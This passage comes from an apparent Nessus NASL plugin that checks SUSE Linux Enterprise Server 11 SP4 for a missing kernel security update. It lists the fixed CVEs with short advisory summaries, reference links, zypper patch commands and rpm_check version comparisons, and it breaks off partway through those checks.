CVE-2016-1583: Prevent the usage of mmap when the lower\n file system does not allow it. This could have lead to\n local privilege escalation when ecryptfs-utils was\n installed and /sbin/mount.ecryptfs_private was setuid\n (bsc#983143).\n\n - CVE-2016-4913: The get_rock_ridge_filename function in\n fs/isofs/rock.c in the Linux kernel mishandles NM (aka\n alternate name) entries containing \\0 characters, which\n allowed local users to obtain sensitive information from\n kernel memory or possibly have unspecified other impact\n via a crafted isofs filesystem (bnc#980725).\n\n - CVE-2016-4580: The x25_negotiate_facilities function in\n net/x25/x25_facilities.c in the Linux kernel did not\n properly initialize a certain data structure, which\n allowed attackers to obtain sensitive information from\n kernel stack memory via an X.25 Call Request\n (bnc#981267).\n\n - CVE-2016-4805: Use-after-free vulnerability in\n drivers/net/ppp/ppp_generic.c in the Linux kernel\n allowed local users to cause a denial of service (memory\n corruption and system crash, or spinlock) or possibly\n have unspecified other impact by removing a network\n namespace, related to the ppp_register_net_channel and\n ppp_unregister_channel functions (bnc#980371).\n\n - CVE-2016-0758: Tags with indefinite length could have\n corrupted pointers in asn1_find_indefinite_length\n (bsc#979867).\n\n - CVE-2016-2187: The gtco_probe function in\n drivers/input/tablet/gtco.c in the Linux kernel allowed\n physically proximate attackers to cause a denial of\n service (NULL pointer dereference and system crash) via\n a crafted endpoints value in a USB device descriptor\n (bnc#971944).\n\n - CVE-2016-4482: The proc_connectinfo function in\n drivers/usb/core/devio.c in the Linux kernel did not\n initialize a certain data structure, which allowed local\n users to obtain sensitive information from kernel stack\n memory via a crafted USBDEVFS_CONNECTINFO ioctl call\n (bnc#978401).\n\n - CVE-2016-2053: The asn1_ber_decoder function in\n lib/asn1_decoder.c in the Linux kernel allowed attackers\n to cause a denial of service (panic) via an ASN.1 BER\n file that lacks a public key, leading to mishandling by\n the public_key_verify_signature function in\n crypto/asymmetric_keys/public_key.c (bnc#963762).\n\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the\n Linux kernel incorrectly relies on the write system\n call, which allowed local users to cause a denial of\n service (kernel memory write operation) or possibly have\n unspecified other impact via a uAPI interface\n (bnc#979548).\n\n - CVE-2016-4485: The llc_cmsg_rcv function in\n net/llc/af_llc.c in the Linux kernel did not initialize\n a certain data structure, which allowed attackers to\n obtain sensitive information from kernel stack memory by\n reading a message (bnc#978821).\n\n - CVE-2016-4578: sound/core/timer.c in the Linux kernel\n did not initialize certain r1 data structures, which\n allowed local users to obtain sensitive information from\n kernel stack memory via crafted use of the ALSA timer\n interface, related to the (1) snd_timer_user_ccallback\n and (2) snd_timer_user_tinterrupt functions\n (bnc#979879).\n\n - CVE-2016-4569: The snd_timer_user_params function in\n sound/core/timer.c in the Linux kernel did not\n initialize a certain data structure, which allowed local\n users to obtain sensitive information from kernel stack\n memory via crafted use of the ALSA timer interface\n (bnc#979213).\n\n - CVE-2016-4486: The rtnl_fill_link_ifmap function in\n net/core/rtnetlink.c in the Linux kernel did not\n initialize a certain data structure, which allowed local\n users to obtain sensitive information from kernel stack\n memory by reading a Netlink message (bnc#978822).\n\n - CVE-2016-3134: The netfilter subsystem in the Linux\n kernel did not validate certain offset fields, which\n allowed local users to gain privileges or cause a denial\n of service (heap memory corruption) via an\n IPT_SO_SET_REPLACE setsockopt call (bnc#971126).\n\n - CVE-2016-2847: fs/pipe.c in the Linux kernel did not\n limit the amount of unread data in pipes, which allowed\n local users to cause a denial of service (memory\n consumption) by creating many pipes with non-default\n sizes (bnc#970948).\n\n - CVE-2016-2188: The iowarrior_probe function in\n drivers/usb/misc/iowarrior.c in the Linux kernel allowed\n physically proximate attackers to cause a denial of\n service (NULL pointer dereference and system crash) via\n a crafted endpoints value in a USB device descriptor\n (bnc#970956).\n\n - CVE-2016-3138: The acm_probe function in\n drivers/usb/class/cdc-acm.c in the Linux kernel allowed\n physically proximate attackers to cause a denial of\n service (NULL pointer dereference and system crash) via\n a USB device without both a control and a data endpoint\n descriptor (bnc#970911).\n\n - CVE-2016-3137: drivers/usb/serial/cypress_m8.c in the\n Linux kernel allowed physically proximate attackers to\n cause a denial of service (NULL pointer dereference and\n system crash) via a USB device without both an\n interrupt-in and an interrupt-out endpoint descriptor,\n related to the cypress_generic_port_probe and\n cypress_open functions (bnc#970970).\n\n - CVE-2016-3140: The digi_port_init function in\n drivers/usb/serial/digi_acceleport.c in the Linux kernel\n allowed physically proximate attackers to cause a denial\n of service (NULL pointer dereference and system crash)\n via a crafted endpoints value in a USB device descriptor\n (bnc#970892).\n\n - CVE-2016-2186: The powermate_probe function in\n drivers/input/misc/powermate.c in the Linux kernel\n allowed physically proximate attackers to cause a denial\n of service (NULL pointer dereference and system crash)\n via a crafted endpoints value in a USB device descriptor\n (bnc#970958).\n\n - CVE-2016-2185: The ati_remote2_probe function in\n drivers/input/misc/ati_remote2.c in the Linux kernel\n allowed physically proximate attackers to cause a denial\n of service (NULL pointer dereference and system crash)\n via a crafted endpoints value in a USB device descriptor\n (bnc#971124).\n\n - CVE-2016-3156: The IPv4 implementation in the Linux\n kernel mishandles destruction of device objects, which\n allowed guest OS users to cause a denial of service\n (host OS networking outage) by arranging for a large\n number of IP addresses (bnc#971360).\n\n - CVE-2016-2184: The create_fixed_stream_quirk function in\n sound/usb/quirks.c in the snd-usb-audio driver in the\n Linux kernel allowed physically proximate attackers to\n cause a denial of service (NULL pointer dereference or\n double free, and system crash) via a crafted endpoints\n value in a USB device descriptor (bnc#971125).\n\n - CVE-2016-3139: The wacom_probe function in\n drivers/input/tablet/wacom_sys.c in the Linux kernel\n allowed physically proximate attackers to cause a denial\n of service (NULL pointer dereference and system crash)\n via a crafted endpoints value in a USB device descriptor\n (bnc#970909).\n\n - CVE-2016-2143: The fork implementation in the Linux\n kernel on s390 platforms mishandles the case of four\n page-table levels, which allowed local users to cause a\n denial of service (system crash) or possibly have\n unspecified other impact via a crafted application,\n related to arch/s390/include/asm/mmu_context.h and\n arch/s390/include/asm/pgalloc.h (bnc#970504).\n\n - CVE-2016-2782: The treo_attach function in\n drivers/usb/serial/visor.c in the Linux kernel allowed\n physically proximate attackers to cause a denial of\n service (NULL pointer dereference and system crash) or\n possibly have unspecified other impact by inserting a\n USB device that lacks a (1) bulk-in or (2) interrupt-in\n endpoint (bnc#968670).\n\n - CVE-2015-8816: The hub_activate function in\n drivers/usb/core/hub.c in the Linux kernel did not\n properly maintain a hub-interface data structure, which\n allowed physically proximate attackers to cause a denial\n of service (invalid memory access and system crash) or\n possibly have unspecified other impact by unplugging a\n USB hub device (bnc#968010).\n\n - CVE-2015-7566: The clie_5_attach function in\n drivers/usb/serial/visor.c in the Linux kernel allowed\n physically proximate attackers to cause a denial of\n service (NULL pointer dereference and system crash) or\n possibly have unspecified other impact by inserting a\n USB device that lacked a bulk-out endpoint (bnc#961512).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=676471\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=866130\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=898592\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936530\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=940413\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=944309\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=946122\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=949752\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=953369\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=956491\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=956852\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=957986\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=957988\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=957990\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=959381\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=960458\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=960857\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=961512\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=961518\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=963762\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=963998\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=965319\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=965860\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=965923\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966245\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=967863\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=967914\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968010\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968018\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968141\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968500\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968566\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968670\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968687\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=969149\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=969391\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=969571\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970114\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970504\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970892\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970909\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970911\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970948\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970956\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970958\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=970970\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971124\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971125\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971126\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971360\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971433\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971446\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971729\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971944\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971947\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971989\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=972363\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=973237\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=973378\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=973556\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=973570\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=974646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=974787\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=975358\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=975772\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=975945\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=976739\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=976868\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=978401\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=978821\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=978822\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979213\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979274\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979347\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979419\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979548\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979595\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979867\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=979879\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=980371\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=980725\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=980788\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=980931\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=981231\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=981267\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=982532\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=982691\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=983143\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=983213\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=984107\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7566/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8816/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-0758/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-1583/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2053/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2143/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2184/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2185/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2186/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2187/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2188/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2782/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2847/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3134/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3137/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3138/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3139/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3140/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3156/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4482/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4485/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4486/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4565/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4569/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4578/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4580/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4805/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4913/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5244/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20161672-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ea06d969\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 11-SP4 :\n\nzypper in -t patch sdksp4-kernel-source-12631=1\n\nSUSE Linux Enterprise Server 11-SP4 :\n\nzypper in -t patch slessp4-kernel-source-12631=1\n\nSUSE Linux Enterprise Server 11-EXTRA :\n\nzypper in -t patch slexsp3-kernel-source-12631=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4 :\n\nzypper in -t patch dbgsp4-kernel-source-12631=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-ec2-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-ec2-base-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-ec2-devel-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-xen-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-pae-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-pae-base-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-pae-devel-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-default-man-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-default-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-default-base-3.0.101-77.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-default-devel